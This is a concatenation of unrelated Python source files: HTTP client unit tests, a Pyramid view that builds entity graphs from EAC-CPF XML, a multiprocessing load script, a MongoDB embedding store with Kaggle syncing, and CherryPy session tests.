req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
print(req.body)
print("HERH```````````````````")
# print(req.body["a"])
outargs = json.loads(req.body)
print(type(outargs))
print(outargs['a'][0])
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
Entity.py
|
from pyramid.response import Response
from pyramid.view import view_config
import os
import sys
import time
import json
from datetime import datetime, timedelta
from lxml import etree, html
from .config import Config
import logging
log = logging.getLogger(__name__)
import networkx as nx
from networkx.readwrite import json_graph
from .Helpers import *
import multiprocessing
from pymongo.errors import (
OperationFailure
)
import pymongo
class Entity:
def __init__(self, request):
"""For a given site - assemble the entity graph
@params:
request.matchdict: code, the site of interest
request.matchdict: explore, the type of graph being requested
"""
self.request = request
self.db = mdb(request)
self.site = request.matchdict.get('code')
self.eid = request.matchdict.get('id')
claims, site = verify_access(request, site=self.site)
self.eac_path = site['eac']
self.source_map = site['map']
self.name = site['name']
self.url = site['url']
log.debug("Processing site: %s, data path: %s" % (self.site, self.eac_path))
def build(self) :
# is the data available? return now; nothing to do
doc = self.db.entity.find_one({ 'site': self.site, 'id': self.eid })
if doc is not None:
log.debug('Graph already built. No need to build it again')
return
j = multiprocessing.Process(target=self.build_graph)
j.start()
def build_graph(self):
log.debug('Building the graph.')
t1 = time.time()
self.graph = nx.Graph()
count = 0
save_counter = 0
nodes = {}
fname = os.path.join(self.eac_path, "%s.xml" % self.eid)
        try:
            tree = etree.parse(fname)
        except (TypeError, etree.XMLSyntaxError):
            log.error("Invalid XML file: %s. %s." % (fname, sys.exc_info()[1]))
            return
ndegrees = 0
self.entities_as_nodes(tree, ndegrees)
# count the number of connections
for n in self.graph:
self.graph.node[n]['connections'] = len(list(self.graph.neighbors(n)))
# save the graph
self.db.entity.insert({
'site': self.site,
'id': self.eid,
'graph_data': json_graph.node_link_data(self.graph),
'createdAt': datetime.utcnow()
})
data_age = self.request.registry.app_config['general']['data_age']
try:
self.db.entity.ensure_index('createdAt', expireAfterSeconds = int(data_age))
except OperationFailure:
self.db.entity.drop_index('createdAt_1')
self.db.entity.ensure_index('createdAt', expireAfterSeconds = int(data_age))
# all done
t2 = time.time()
log.debug("Time taken to prepare data '/entity': %s" % (t2 - t1))
return
def entities_as_nodes(self, tree, ndegrees):
node_id = get(tree, '/e:eac-cpf/e:control/e:recordId')
ntype = get(tree, "/e:eac-cpf/e:control/e:localControl[@localType='typeOfEntity']/e:term")
core_type = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:entityType")
url = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:entityId[1]")
df = get(tree, "/e:eac-cpf/e:cpfDescription/e:description/e:existDates/e:dateRange/e:fromDate", attrib="standardDate")
dt = get(tree, "/e:eac-cpf/e:cpfDescription/e:description/e:existDates/e:dateRange/e:toDate", attrib="standardDate")
name = self.get_entity_name(tree, ntype)
if len(df) == 0:
df = None
if len(dt) == 0:
dt = None
if node_id not in self.graph:
try:
self.graph.add_node(node_id)
except:
                # Something seriously wrong happened. This should raise an exception so we can clean up the network progress.
e = sys.exc_info()[0]
log.error("Failed to insert node %s" % e)
self.graph.node[node_id]['type'] = ntype
self.graph.node[node_id]['coreType'] = core_type
self.graph.node[node_id]['name'] = name
self.graph.node[node_id]['url'] = url
self.graph.node[node_id]['df'] = df
self.graph.node[node_id]['dt'] = dt
if ndegrees == 2:
return
ndegrees += 1
related_entities = get(tree, '/e:eac-cpf/e:cpfDescription/e:relations/e:cpfRelation', element=True)
for node in related_entities:
try:
neighbour_ref = node.attrib['{http://www.w3.org/1999/xlink}href']
if neighbour_ref.startswith('http'):
neighbour_ref_local = neighbour_ref.replace(self.source_map['source'], self.source_map['localpath'])
else:
# assume it's relative
neighbour_ref_local = "%s/%s" % (self.source_map['localpath'], neighbour_ref)
try:
xml_datafile = get_xml(href=neighbour_ref_local)
if xml_datafile is not None:
if xml_datafile.startswith('http'):
xml_datafile_local = xml_datafile.replace(self.source_map['source'], self.source_map['localpath'])
else:
# assume it's relative
xml_datafile_local = "%s/%s" % (self.source_map['localpath'], xml_datafile)
neighbour_tree = etree.parse(xml_datafile_local)
else:
raise IOError
except IOError:
log.error("No EAC reference to XML source in: %s" % neighbour_ref_local)
continue
except etree.XMLSyntaxError:
log.error("Invalid XML file: %s" % xml_datafile)
continue
except TypeError:
log.error("Some kind of error with: %s" % xml_datafile)
continue
neighbour_id = get(neighbour_tree, '/e:eac-cpf/e:control/e:recordId')
if len(neighbour_id) == 0:
# we've probably read an eac file - try the eac xpath
neighbour_id = get(neighbour_tree, '/eac/control/id')
# add node, add edge, call this method on this node
self.graph.add_node(neighbour_id)
self.graph.add_edge(node_id, neighbour_id, sid=node_id, tid=neighbour_id)
self.entities_as_nodes(neighbour_tree, ndegrees)
except KeyError:
print(etree.tostring(node, pretty_print=True))
related_resources = list(get(tree, '/e:eac-cpf/e:cpfDescription/e:relations/e:resourceRelation[@resourceRelationType="other"]', element=True, aslist=True))
for node in related_resources:
# for each node - get the id, type, name and href
# add a node to describe it
# add an edge between this node (context node) and the resource node
rurl = node.attrib['{http://www.w3.org/1999/xlink}href']
core_type = get(node, 'e:relationEntry', attrib='localType')
rname = get(node, 'e:relationEntry')
rid = rurl.split('/')[-1:][0].split('.htm')[0]
if core_type == 'published':
rtype = rname.split(':')[0]
rname = rname.split(':', 1)[1:][0].strip()
else:
rtype = core_type
if rid not in self.graph:
try:
self.graph.add_node(rid)
except:
                # Something seriously wrong happened. This should raise an exception so we can clean up the network progress.
e = sys.exc_info()[0]
log.error("Failed to insert node %s" % e)
return
#if we get here we have a valid node
self.graph.node[rid]['type'] = rtype
self.graph.node[rid]['coreType'] = core_type
self.graph.node[rid]['name'] = rname
self.graph.node[rid]['url'] = rurl
self.graph.add_edge(rid, node_id, sid=rid, tid=node_id)
def get_entity_name(self, tree, ntype):
if ntype == 'Person':
if get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry/e:part[@localType='familyname']"):
ln = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry/e:part[@localType='familyname']")
gn = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry/e:part[@localType='givenname']")
return "%s, %s" % (ln, gn)
else:
fn = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry[position() = 1]/e:part")
if type(fn) == list:
return ', '.join(fn)
return fn
else:
fn = get(tree, "/e:eac-cpf/e:cpfDescription/e:identity/e:nameEntry[position() = 1]/e:part")
if type(fn) == list:
return ', '.join(fn)
return fn
def data(self):
# get the data file url
if self.request.GET.get('q') is not None:
datafile = self.request.GET.get('q').replace(self.source_map['source'], self.source_map['localpath'])
else:
return ''
# if there's an EAC ref - use it
xml = get_xml(datafile)
if xml is not None:
tree = etree.parse(xml.replace(self.source_map['source'], self.source_map['localpath']))
summnote = get(tree, '/e:eac-cpf/e:cpfDescription/e:description/e:biogHist/e:abstract', element=True)
sn = ''
if len(summnote) != 0:
sn = etree.tostring(get(tree, '/e:eac-cpf/e:cpfDescription/e:description/e:biogHist/e:abstract', element=True), method='html')
sn=sn.decode('UTF8')
full_note = get(tree, '/e:eac-cpf/e:cpfDescription/e:description/e:biogHist', element=True)
fn = ''
if len(full_note) != 0:
fn = []
for c in full_note.getchildren():
if c.tag == '{urn:isbn:1-931666-33-4}abstract':
c.getparent().remove(c)
full_note = [ etree.tostring(f, method='html').decode('UTF8') for f in full_note ]
for c in full_note:
c = c.replace('<list', '<ul' )
c = c.replace('</list', '</ul')
c = c.replace('<item', '<li' )
c = c.replace('</item', '</li')
fn.append(c)
fn = ' '.join(fn)
return str(sn), str(fn)
else:
# no EAC datafile
tree = html.parse(datafile)
data = tree.xpath('//dl[@class="content-summary"]')
return None, etree.tostring(data[0]).decode('UTF8')
|
process_test.py
|
#!/usr/bin/python
# coding=utf8
import math
import sys
from multiprocessing import Pool
from multiprocessing import Process
def f(x):
return x*x
#if __name__ == '__main__':
# p = Pool(5)
# print(p.map(f, range(100000000)))
def process_fun(num):
sum = 0
while(1):
sum += 1
p = math.sin(sum * math.pi)
if sum % 10000 == 0:
            sys.stdout.write('process-%d: %d\n' % (num, sum))
if __name__ == '__main__':
for i in range(10):
print('starting process %d...' % i)
p = Process(target=process_fun, args=(i,))
p.start()
print('all process started')
|
database.py
|
from threading import Thread
from collections import defaultdict, OrderedDict
import schedule
import time
import os
import glob
import glob2
import json
from tqdm import tqdm
import concurrent.futures as cf
from functools import partial
import pickle
from bson.binary import Binary
import datetime
from . import Params
from . import Connection
#from section_translator import SectionTranslator
class Database:
"""
==============================================================================
==============================================================================
DDBB METHODS
==============================================================================
==============================================================================
"""
"""
==============================================================================
CACHE
==============================================================================
"""
CACHE = {
}
def add_cache(name, data, valid=None):
if valid is None:
valid = datetime.timedelta(hours=12)
Database.CACHE[name] = {
'data': data,
'valid': datetime.datetime.now() + valid
}
    def get_cache(name):
        data = Database.CACHE.get(name, None)
        if data is None:
            return None
        # Only return the cached value while it has not expired yet.
        if data['valid'] > datetime.datetime.now():
            return data['data']
        return None
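    # Illustrative usage of the in-memory cache above (a sketch; the key and payload
    # are arbitrary): store a value for one hour and read it back before it expires.
    @staticmethod
    def example_cache_roundtrip():
        Database.add_cache('example_key', {'answer': 42}, valid=datetime.timedelta(hours=1))
        return Database.get_cache('example_key')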
"""
==============================================================================
METHODS HOOK
==============================================================================
"""
METHODS = {}
@staticmethod
def register_method(class_method):
if hasattr(class_method, 'NAME'):
name = getattr(class_method, 'NAME')
else:
name = class_method.__class__.__name__
assert('.' not in name and '$' not in name)
Database.METHODS[name] = {
'class': class_method,
'init': False
}
@staticmethod
def get_method(name):
assert('.' not in name and '$' not in name)
class_dict = Database.METHODS[name]
method_obj = class_dict['class']
if not class_dict['init']:
method_obj.init()
class_dict['init'] = True
return method_obj
@staticmethod
def list_methods():
return list(Database.METHODS.keys())
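    # Illustrative sketch (an assumed interface, not shipped with this module): a minimal
    # embedding "method" object exposing the attributes this class looks for. NAME selects
    # the MongoDB sub-field, TYPE_THREADING=None forces the sequential loop in
    # update_mean_vectors, and compute_mean_vector / get_mean_vector mirror the calls made
    # by the update and read helpers below.
    @staticmethod
    def example_register_method():
        class _ConstantMethod:
            NAME = 'constant_example'
            TYPE_THREADING = None
            def init(self):
                pass
            def compute_mean_vector(self, raw):
                # One dummy vector per section of the raw document.
                return {k: {'vector': [1.0], 'num_elements': 1} for k in raw.get('sections', {})}
            def get_mean_vector(self, sections_embeddings):
                for v in sections_embeddings.values():
                    if v is not None:
                        return v['vector']
                return None
        Database.register_method(_ConstantMethod())
        return Database.get_method('constant_example')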
"""
==============================================================================
INSERTION
==============================================================================
"""
@staticmethod
def exists(hash_id):
return Connection.DB.documents.find_one({'hash_id': hash_id}) is not None
@staticmethod
def format_document_from_raw(raw_document):
document = {
'hash_id': raw_document['hash_id'],
'title': raw_document['title'],
'url': None,
'clean': {
#sections: ...
# citations: ...
},
'raw': {
'authors': raw_document['authors'],
'sections': raw_document['sections'],
'citations': raw_document['citations'],
'bib_entries': raw_document['bib_entries'],
'ref_entries': raw_document['ref_entries']
},
'sections_order': raw_document['sections_order'],
'sections_embeddings': {
# algorithm:
# word2vec:
# abstract: {
# vector: ...
# num_elements: ...
# }
},
'entities': {
# words:
# embeddings
},
'topics': None, # embeddings,
'sections_translation': {
# section -> {#method, #abstract, #conclusions, #results, #acks, #references}
}
}
return document
@staticmethod
def insert_raw_documents(raw_documents):
"""
raw_documents: list of raw_documents
"""
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
documents = [Database.format_document_from_raw(doc) for doc in raw_documents]
Connection.DB.documents.insert_many(documents)
@staticmethod
def insert_raw_document(raw_document):
"""
raw_document: dict
"""
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
doc = Database.format_document_from_raw(raw_document)
Connection.DB.documents.insert_one(doc)
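    # Illustrative helper (a sketch): parse a single JSON file with parse_document_json
    # (defined further below) and insert it if it is new. json_path is a placeholder;
    # None is returned for duplicates or unreadable files.
    @staticmethod
    def example_ingest_file(json_path):
        raw_doc = Database.parse_document_json(json_path)
        if raw_doc is not None:
            Database.insert_raw_document(raw_doc)
        return raw_doc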
"""
==============================================================================
UPDATE
==============================================================================
"""
@staticmethod
def update_raw_documents(raw_documents):
"""
raw_documents: dict
- hash_id
- sections
- citations
"""
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
                for doc in raw_documents:
Connection.DB.documents.update_one({'hash_id': doc['hash_id']}, {'$set': {'raw': doc}}, upsert=True)
@staticmethod
def update_clean_documents(clean_documents):
"""
clean_document: dict
- hash_id
- sections
- citations
"""
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
for doc in clean_documents:
Connection.DB.documents.update_one({'hash_id': doc['hash_id']}, {'$set': {'clean': doc}}, upsert=True)
@staticmethod
def fix_compute_mean_vector(use, func, doc):
return func(doc[use])
@staticmethod
def update_mean_vectors(method, use='raw', force=False):
assert('.' not in method and '$' not in method)
method_obj = Database.get_method(method)
        if not force:
            # Only fetch documents that do not yet have embeddings for this method.
            query_dict = {f'sections_embeddings.{method}': {'$exists': False}}
        else:
            query_dict = {}
documents = Database.list_documents(query=query_dict, projection={use: 1, 'hash_id': 1, '_id': 0, f'sections_embeddings.{method}': 1})
num_workers = Params.COMPUTE_VECTORS_WORKERS if not hasattr(method_obj, 'NUM_WORKERS') else method_obj.NUM_WORKERS
use_loop = False
if hasattr(method_obj, 'TYPE_THREADING'):
if method_obj.TYPE_THREADING == 'pytorch':
import torch.multiprocessing as mp
try:
mp.set_start_method('spawn', True)
except:
pass
create_exec = lambda: mp.Pool(num_workers)
elif method_obj.TYPE_THREADING == 'python':
from multiprocessing import Pool
create_exec = lambda: Pool(num_workers)
elif method_obj.TYPE_THREADING == None:
use_loop = True
else:
create_exec = lambda: cf.ThreadPoolExecutor(max_workers=num_workers)
else:
create_exec = lambda: cf.ThreadPoolExecutor(max_workers=num_workers)
if use_loop:
for doc in tqdm(documents):
sections_vector = method_obj.compute_mean_vector(doc[use])
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
if force or method not in doc['sections_embeddings'].keys():
for k in sections_vector.keys():
if sections_vector[k] is not None:
sections_vector[k]['vector'] = Binary(pickle.dumps(sections_vector[k]['vector'], protocol=2))
Connection.DB.documents.update_one({'hash_id': doc['hash_id']}, {'$set': {f'sections_embeddings.{method}': sections_vector}}, upsert=True)
else:
with create_exec() as executor:
for doc, sections_vector in zip(documents, tqdm(executor.map(partial(Database.fix_compute_mean_vector, use, method_obj.compute_mean_vector), documents), total=len(documents))):
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
if force or method not in doc['sections_embeddings'].keys():
for k in sections_vector.keys():
if sections_vector[k] is not None:
sections_vector[k]['vector'] = Binary(pickle.dumps(sections_vector[k]['vector'], protocol=2))
Connection.DB.documents.update_one({'hash_id': doc['hash_id']}, {'$set': {f'sections_embeddings.{method}': sections_vector}}, upsert=True)
"""
==============================================================================
GET
==============================================================================
"""
    def list_documents(query={}, hash_ids=None, projection={}, use_translation=False):
        query_dict = {}
        if hash_ids is not None:
            query_dict['hash_id'] = {'$in': hash_ids}
        query_dict.update(query)
        # Work on a copy so the caller's projection (and the mutable default) is never mutated.
        projection = dict(projection)
        if use_translation:
            projection.update({'sections_translation': 1})
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
documents = []
for doc in Connection.DB.documents.find(query_dict, projection):
if use_translation:
for type_data in ['raw', 'clean']:
if type_data in projection.keys() and bool(projection[type_data]):
aux_sections = doc[type_data]['sections']
doc[type_data]['sections'] = {}
for k in aux_sections:
fix_section = doc['sections_translation'][k]
doc[type_data]['sections'][fix_section] = aux_sections[k]
documents.append(doc)
return documents
return []
def list_raw_documents(hash_ids=None, use_translation=False):
return Database.list_documents(hash_ids=hash_ids, projection={'raw': 1, 'hash_id': 1, '_id': 0, 'title': 1, 'url': 1}, use_translation=use_translation)
def list_clean_documents(hash_ids=None, use_translation=False):
return Database.list_documents(hash_ids=hash_ids, projection={'clean': 1, 'hash_id': 1, '_id': 0, 'title': 1, 'url': 1}, use_translation=use_translation)
def list_titles(hash_ids=None):
        return Database.list_documents(hash_ids=hash_ids, projection={'title': 1, 'hash_id': 1, '_id': 0})
def read_mean_embedding(method_obj, doc):
if 'sections_embeddings' not in doc:
mean_vector = None
else:
for k in doc['sections_embeddings'].keys():
if doc['sections_embeddings'][k] is not None:
doc['sections_embeddings'][k]['vector'] = pickle.loads(doc['sections_embeddings'][k]['vector'])
mean_vector = method_obj.get_mean_vector(doc['sections_embeddings'])
return {
'vector': mean_vector,
'hash_id': doc['hash_id']
}
def list_doc_embeddings(method, hash_ids=None, cache=True):
assert('.' not in method and '$' not in method)
method_obj = Database.get_method(method)
query_dict = {}
if hash_ids is not None:
query_dict['hash_id'] = {'$in': hash_ids}
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
output_vectors = []
with cf.ThreadPoolExecutor(max_workers=Params.READ_EMBEDDINGS_WORKERS) as executor:
list_docs = Connection.DB.documents.aggregate([
{'$project': {'sections_translation': 1, 'sections_embeddings': f'$sections_embeddings.{method}', 'hash_id': 1, '_id': 0}}
])
for vec in executor.map(partial(Database.read_mean_embedding, method_obj), list_docs):
output_vectors.append(vec)
return output_vectors
return []
    def read_mean_embedding_from_section(method_obj, section, use_translation, doc):
        if use_translation:
            translation_lut = doc['sections_translation']
        else:
            translation_lut = None
        for k in doc['sections_embeddings'].keys():
            if doc['sections_embeddings'][k] is not None:
                doc['sections_embeddings'][k]['vector'] = pickle.loads(doc['sections_embeddings'][k]['vector'])
        mean_vector = method_obj.get_mean_vector_from_section(doc['sections_embeddings'], section, translation_lut)
        return {
            'vector': mean_vector,
            'hash_id': doc['hash_id']
        }
def list_doc_embeddings_from_section(method, section, hash_ids=None, use_translation=False):
assert('.' not in method and '$' not in method)
method_obj = Database.get_method(method)
query_dict = {}
if hash_ids is not None:
query_dict['hash_id'] = {'$in': hash_ids}
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
output_vectors = []
with cf.ThreadPoolExecutor(max_workers=Params.READ_EMBEDDINGS_WORKERS) as executor:
list_docs = Connection.DB.documents.aggregate([
{'$match': query_dict},  # apply the optional hash_ids filter built above
{'$project': {'sections_translation': 1, 'sections_embeddings': f'$sections_embeddings.{method}', 'hash_id': 1, '_id': 0}}
])
for vec in executor.map(partial(Database.read_mean_embedding_from_section, method_obj, section, use_translation), list_docs):
output_vectors.append(vec)
return output_vectors
return []
"""
==============================================================================
==============================================================================
DATA INGESTION AND PROCESSING
==============================================================================
==============================================================================
"""
"""
==============================================================================
SCAN AND SAVE
==============================================================================
"""
@staticmethod
def parse_document_json(json_path):
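# Parse one paper JSON file (paper_id, metadata, abstract, body_text, bib/ref entries)
# into the flat document stored in MongoDB: per-section concatenated text, per-section
# citation spans with offsets rebased onto the concatenated text, and the original
# section order. Returns None for unparsable files or papers already in the database.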
data = {}
with open(json_path) as json_file:
try:
json_data = json.load(json_file)
except (json.JSONDecodeError, UnicodeDecodeError):
# Skip files that cannot be parsed as JSON
return None
if Database.exists(json_data['paper_id']):
return None
data['hash_id'] = json_data['paper_id']
data['title'] = json_data['metadata']['title']
data['authors'] = json_data['metadata']['authors']
data['bib_entries'] = json_data['bib_entries']
data['ref_entries'] = json_data['ref_entries']
data['citations'] = defaultdict(list)
data['sections'] = defaultdict(lambda: "")
# Abstract
if isinstance(json_data['abstract'], (list, tuple)):
try:
data['sections']['abstract'] = json_data['abstract'][0]['text']
data['citations']['abstract'] += [{'start': cite['start'], 'end': cite['end'], 'ref_id': cite['ref_id']} for cite in json_data['abstract'][0]['cite_spans']]
except (IndexError, KeyError, TypeError):
data['sections']['abstract'] = ''
else:
data['sections']['abstract'] = json_data['abstract']
offsets = defaultdict(lambda: 0)
sections_order = OrderedDict()
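# Body text arrives as blocks; blocks belonging to the same section are concatenated,
# so each block's citation spans are shifted by the running length of that section
# (tracked in offsets) before being stored.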
for block_text in json_data['body_text']:
text = block_text['text']
section = block_text['section'].replace('.', "").replace("$", "")
data['sections'][section] += text
data['citations'][section] += [{'start': offsets[section] + cite['start'], 'end': offsets[section] + cite['end'], 'ref_id': cite['ref_id']} for cite in block_text['cite_spans']]
offsets[section] += len(text)
if section not in sections_order:
sections_order[section] = True
data['sections_order'] = list(sections_order.keys())
return data
@staticmethod
def scan_file(json_path):
return Database.parse_document_json(json_path)
@staticmethod
def scan_folder(folder_path):
documents = []
# Iterate over the dataset sub-folders without shadowing the outer folder_path argument.
for subfolder_path in filter(os.path.isdir, glob2.iglob(os.path.join(folder_path, "*"))):
folder_name = os.path.basename(subfolder_path)
print('\tProcessing %s folder' % (folder_name, ))
with cf.ThreadPoolExecutor(max_workers=Params.SCAN_WORKERS) as executor:
list_jsons = glob2.glob(os.path.join(subfolder_path, "**", "*.json"))
for raw_doc in tqdm(executor.map(Database.scan_file, list_jsons), total=len(list_jsons)):
if raw_doc is not None:
Database.insert_raw_document(raw_doc)
documents.append(raw_doc)
# Return
return documents
"""
==============================================================================
SYNC
==============================================================================
"""
@staticmethod
def sync(callback_preprocessing=None):
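# Download the latest dataset snapshot from Kaggle, scan it for papers not yet in the
# database, and pass the newly inserted raw documents to callback_preprocessing.
# The is_processing flag keeps overlapping runs from piling up; the job runs once
# immediately and then roughly once per hour via the schedule loop below.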
# Lazy loading to avoid asking for credentials when not syncing
import kaggle
is_processing = False
def __sync_thread():
nonlocal is_processing
if is_processing:
return
is_processing = True
print('Checking new changes...')
# Download from kaggle
kaggle.api.authenticate()
kaggle.api.dataset_download_files(Params.DATASET_KAGGLE_NAME, path=Params.DATASET_KAGGLE_RAW, unzip=True)
# Create new dataset with the changes
raw_documents = Database.scan_folder(Params.DATASET_KAGGLE_RAW)
# Execute callback
if callback_preprocessing is not None:
callback_preprocessing(raw_documents)
# Is done
is_processing = False
t = Thread(target=__sync_thread)
t.start()
schedule.every().hour.do(__sync_thread)
while True:
schedule.run_pending()
time.sleep(3600)
|
test_session.py
|
import os
import threading
import time
import socket
from http.client import HTTPConnection
import pytest
from path import Path
from more_itertools import consume
import cherrypy
from cherrypy._cpcompat import HTTPSConnection
from cherrypy.lib import sessions
from cherrypy.lib import reprconf
from cherrypy.lib.httputil import response_codes
from cherrypy.test import helper
from cherrypy import _json as json
localDir = Path(__file__).dirname()
def http_methods_allowed(methods=['GET', 'HEAD']):
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ', '.join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
@cherrypy.config(**{
'tools.sessions.on': True,
'tools.sessions.storage_class': sessions.RamSession,
'tools.sessions.storage_path': localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
})
class Root:
@cherrypy.expose
def clear(self):
cherrypy.session.cache.clear()
@cherrypy.expose
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
@cherrypy.expose
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
@cherrypy.expose
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
@cherrypy.expose
@cherrypy.config(**{'tools.sessions.on': False})
def set_session_cls(self, new_cls_name):
new_cls = reprconf.attributes(new_cls_name)
cfg = {'tools.sessions.storage_class': new_cls}
self.__class__._cp_config.update(cfg)
if hasattr(cherrypy, 'session'):
del cherrypy.session
if new_cls.clean_thread:
new_cls.clean_thread.stop()
new_cls.clean_thread.unsubscribe()
del new_cls.clean_thread
@cherrypy.expose
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
@cherrypy.expose
def keyin(self, key):
return str(key in cherrypy.session)
@cherrypy.expose
def delete(self):
cherrypy.session.delete()
sessions.expire()
return 'done'
@cherrypy.expose
def delkey(self, key):
del cherrypy.session[key]
return 'OK'
@cherrypy.expose
def redir_target(self):
return self._cp_config['tools.sessions.storage_class'].__name__
@cherrypy.expose
def iredir(self):
raise cherrypy.InternalRedirect('/redir_target')
@cherrypy.expose
@cherrypy.config(**{
'tools.allow.on': True,
'tools.allow.methods': ['GET'],
})
def restricted(self):
return cherrypy.request.method
@cherrypy.expose
def regen(self):
cherrypy.tools.sessions.regenerate()
return 'logged in'
@cherrypy.expose
def length(self):
return str(len(cherrypy.session))
@cherrypy.expose
@cherrypy.config(**{
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False,
})
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
cherrypy.tree.mount(Root())
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
@classmethod
def teardown_class(cls):
"""Clean up sessions."""
super(cls, cls).teardown_class()
consume(
file.remove_p()
for file in localDir.listdir()
if file.basename().startswith(
sessions.FileSession.SESSION_PREFIX
)
)
@pytest.mark.xfail(reason='#1534')
def test_0_Session(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertDictEqual(json.decode(self.body),
{'counter': 3, 'aha': 'foo'})
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody('True')
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
